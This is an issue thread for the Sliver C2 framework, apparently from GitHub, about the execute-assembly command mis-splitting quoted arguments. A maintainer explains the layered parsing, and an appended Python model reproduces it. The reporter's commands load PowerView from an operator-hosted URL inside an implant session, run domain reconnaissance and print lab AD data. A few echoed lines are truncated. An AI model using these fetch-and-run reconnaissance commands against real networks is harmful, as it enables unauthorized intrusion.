sliver
improve execute-assembly cli parsing ux
Describe the bug If a parameter of the program to be executed contains any space, the execute-assembly command will parse it as a new parameter.
To Reproduce Steps to reproduce the behavior:
- Use execute-assembly to execute a .NET assembly program and provide parameters of the program
- The program powersharp.exe accepts two parameters: the 1st is the module to load, the 2nd is the cmdlet to execute
- The command is execute-assembly powersharp.exe "/m:http://192.168.0.44:81/powerview.ps1" "/c:get-netcomputer -identity web01". It means: load powerview remotely and execute the get-netcomputer -identity web01 cmdlet.
- It displays all net computers. After debugging, I find that -identity is regarded as the 3rd parameter, and web01 is regarded as the 4th parameter.
[server] sliver (SMOGGY_CREATURE) > execute-assembly powersharp.exe "/m:http://192.168.0.44:81/powerview.ps1" "/c:get-netcomputer -identity web01"
[*] Output:
4
/m:http://192.168.0.44:81/powerview.ps1
/c:get-netcomputer
-identity
web01
Usage: powersharp.exe "/m:<Module>" "/c:<cmdlet>"
Import a remote module and execute a cmdlet: powersharp.exe "/m:.\powerview.ps1" "/c:Get-NetComputer | select dnshostname"
Import a local module and execute a cmdlet: powersharp.exe "/m:http://192.168.1.100/powerview.ps1' "/c:Get-NetComputer | select dnshostname"
Execute a cmdlet without importing a module: powersharp.exe "/m:" '/c:Get-Process"
Import a module without executing a cmdlet: powersharp.exe "/m:http://192.168.1.100/shell" "/c:"
Recommend to minimize required output by ultilizing "select"
Expected behavior Only web01's computer information will be displayed, like this:
@{logoncount=68; badpasswordtime=12/31/1600 4:00:00 PM; distinguishedname=CN=WEB01,OU=Web Server,DC=child,DC=htb,DC=local; objectclass=System.DirectoryServices.ResultPropertyValueCollection; badpwdcount=0; lastlogontimestamp=10/13/2022 6:42:35 PM; objectsid=S-1-5-21-2749819870-3967162335-1946002573-1104; samaccountname=WEB01$; localpolicyflags=0; codepage=0; samaccounttype=MACHINE_ACCOUNT; countrycode=0; cn=WEB01; accountexpires=NEVER; whenchanged=10/14/2022 7:43:27 PM; instancetype=4; usncreated=12967; objectguid=42a18d8b-8d41-4118-b7a4-555f322ed7b8; operatingsystem=Windows Server 2019 Datacenter Evaluation; operatingsystemversion=10.0 (17763); lastlogoff=12/31/1600 4:00:00 PM; msds-allowedtodelegateto=System.DirectoryServices.ResultPropertyValueCollection; objectcategory=CN=Computer,CN=Schema,CN=Configuration,DC=htb,DC=local; dscorepropagationdata=System.DirectoryServices.ResultPropertyValueCollection; serviceprincipalname=System.DirectoryServices.ResultPropertyValueCollection; lastlogon=10/16/2022 9:49:59 AM; iscriticalsystemobject=False; usnchanged=35951; useraccountcontrol=WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION; whencreated=9/14/2022 1:18:27 AM; primarygroupid=515; pwdlastset=10/14/2022 12:43:27 PM; msds-supportedencryptiontypes=28; name=WEB01; dnshostname=web01.red.local}
Desktop (please complete the following information):
- OS: Kali Linux 2022
- Version v1.5.27
Additional context For debugging purposes, I printed all parameters at the beginning of the output.
// Debug aid: print the argument count, then each argument on its own line
Console.WriteLine(args.Length);
for (int i = 0; i < args.Length; i++)
{
    Console.WriteLine(args[i]);
}
Try
execute-assembly powersharp.exe -- "/m:http://192.168.0.44:81/powerview.ps1" "/c:get-netcomputer -identity web01"
Same results?
Thanks for your quick response! Yes, still the issue
[server] sliver (SMOGGY_CREATURE) > execute-assembly powersharp.exe -- "/m:http://192.168.0.44:81/poweretcomputer -identity web01"
[*] Output:
5
--
/m:http://192.168.0.44:81/powerview.ps1;
/c:get-netcomputer
-identity
web01
Usage: powersharp.exe "/m:<Module>" "/c:<cmdlet>"
Import a remote module and execute a cmdlet: powersharp.exe "/m:.\powerview.ps1" "/c:Get-NetComputer | select dns
Import a local module and execute a cmdlet: powersharp.exe "/m:http://192.168.1.100/powerview.ps1' "/c:Get-NetCoostname"
Execute a cmdlet without importing a module: powersharp.exe "/m:" '/c:Get-Process"
Import a module without executing a cmdlet: powersharp.exe "/m:http://192.168.1.100/shell" "/c:"
Recommend to minimize required output by ultilizing "select"
Oh you know what, it's probably a nested encoding issue, it's a little un-intuitive but I think* this will work:
execute-assembly powersharp.exe -- \"/m:http://192.168.0.44:81/poweretcomputer -identity web01\"
Thanks, this works partially, but -- is parsed as a parameter.
[server] sliver (SMOGGY_CREATURE) > execute-assembly /opt/red/powersharp.exe -- \"/m:http://192.168.0.44:81/powerview.ps1\" \"/c:get-netcomputer -identity web01\"
[*] Output:
3
--
/m:http://192.168.0.44:81/powerview.ps1
/c:get-netcomputer -identity web01
Usage: powersharp.exe "/m:<Module>" "/c:<cmdlet>"
Import a remote module and execute a cmdlet: powersharp.exe "/m:.\powerview.ps1" "/c:Get-NetComputer | select dnshostname"
Import a local module and execute a cmdlet: powersharp.exe "/m:http://192.168.1.100/powerview.ps1' "/c:Get-NetComputer | select dnshostname"
Execute a cmdlet without importing a module: powersharp.exe "/m:" '/c:Get-Process"
Import a module without executing a cmdlet: powersharp.exe "/m:http://192.168.1.100/shell" "/c:"
Recommend to minimize required output by ultilizing "select"
Yea that should go here, to appease the grumble parser:
execute-assembly -- /opt/red/powersharp.exe \"/m:http://192.168.0.44:81/powerview.ps1\" \"/c:get-netcomputer -identity web01\"
I modified the source code of powersharp to accept -- as the first parameter.
else if (param == 3) // Parameter verification in Sliver's execute-assembly: parameter1 must be "--", parameter2 must start with "/m:", parameter3 must start with "/c:".
{
    string arg1 = args[0];
    string arg2 = args[1];
    string arg3 = args[2];
    // StartsWith avoids the ArgumentOutOfRangeException that Substring(0, n) throws on an argument shorter than n
    if (!arg1.StartsWith("--") || !arg2.StartsWith("/m:") || !arg3.StartsWith("/c:"))
    {
        Console.WriteLine("The 1st parameter should be --, the 2nd parameter should start with \"/m:\", the 3rd parameter should start with \"/c:\"\n");
        Display();
        return;
    }
}
And now the execution is successful.
[server] sliver (SMOGGY_CREATURE) > execute-assembly /opt/red/powersharp.exe --- \"/m:http://192.168.0.44:81/powerview.ps1\" \"/c:get-netcomputer |select dnshostname\"
[*] Output:
@{dnshostname=dc01.child.htb.local}
@{dnshostname=web01.child.htb.local}
@{dnshostname=srv01.child.htb.local}
@{dnshostname=srv02.child.htb.local}
@{dnshostname=my.child.htb.local}
It would be greatly appreciated if execute-assembly could parse parameters correctly by itself, just like Cobalt Strike :D Keep up the good work, Sliver has great potential!
The behavior is the result of layering CLI parsers as described here on the wiki; it's working as intended. Sliver's commands are just structured differently, and we'd have to modify our upstream REPL library to change this, which we don't really want to do.
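The layered-parser behaviour the thread arrives at can be reproduced with a small model. The following Python is an added illustration, not Sliver's, grumble's or powersharp's code: it assumes a first layer that tokenizes the whole line shell-style (consuming one level of quotes and treating a `--` directly after the command name as the option terminator) and a second layer that re-joins and re-tokenizes the positionals after the assembly path. The program name `tool.exe` and its arguments are constructed placeholders. Under those assumptions it shows why plain quotes are lost, why backslash-escaped quotes (`\"…\"`) survive to the inner layer, and why the position of `--` decides whether it reaches the program.

```python
import shlex

# Constructed sample lines; tool.exe and its arguments are placeholders, not the tools in the thread.
PLAIN_QUOTES = 'execute-assembly tool.exe "/m:module.ps1" "/c:get-item -name web01"'
ESCAPED_QUOTES = 'execute-assembly tool.exe \\"/m:module.ps1\\" \\"/c:get-item -name web01\\"'
EARLY_DASHDASH = 'execute-assembly -- tool.exe \\"/m:module.ps1\\" \\"/c:get-item -name web01\\"'
LATE_DASHDASH = 'execute-assembly tool.exe -- \\"/m:module.ps1\\" \\"/c:get-item -name web01\\"'


def repl_layer(line):
    """Layer 1 (assumed model of the REPL): POSIX shell-style split, one level of quoting consumed.
    A '--' immediately after the command name is the option terminator and is dropped;
    anywhere else it is an ordinary positional token."""
    tokens = shlex.split(line)
    command, positionals = tokens[0], tokens[1:]
    if positionals and positionals[0] == "--":
        positionals = positionals[1:]
    return command, positionals


def command_layer(positionals):
    """Layer 2 (assumed model of the command): the positionals after the assembly path are
    re-joined and tokenized again, so only quote characters that survived layer 1 still group words."""
    assembly, rest = positionals[0], positionals[1:]
    return assembly, shlex.split(" ".join(rest))


def assembly_argv(line):
    """Return (assembly, argv) as the executed program would observe them."""
    _, positionals = repl_layer(line)
    return command_layer(positionals)


def quote_for_two_layers(arg):
    """Escape one argument so it survives both layers: layer 1 turns \\" into a literal ",
    which layer 2 then consumes as a grouping quote. Assumes arg itself contains no double quote."""
    return '\\"' + arg + '\\"'


def build_line(assembly, args):
    """Assemble a command line with '--' right after the command name, where layer 1 consumes it."""
    return "execute-assembly -- " + assembly + " " + " ".join(quote_for_two_layers(a) for a in args)


if __name__ == "__main__":
    for name, line in [("plain quotes", PLAIN_QUOTES), ("escaped quotes", ESCAPED_QUOTES),
                       ("-- before assembly", EARLY_DASHDASH), ("-- after assembly", LATE_DASHDASH)]:
        assembly, argv = assembly_argv(line)
        print(f"{name:20} -> {assembly} argv={argv}")
```

Running the block prints four argv vectors: the plain-quoted line splits `/c:get-item -name web01` into three separate arguments, the escaped lines keep it as one, and only the `--` placed after the assembly path shows up in argv. `build_line` produces the form the maintainer recommended, with the separator consumed by the outer layer.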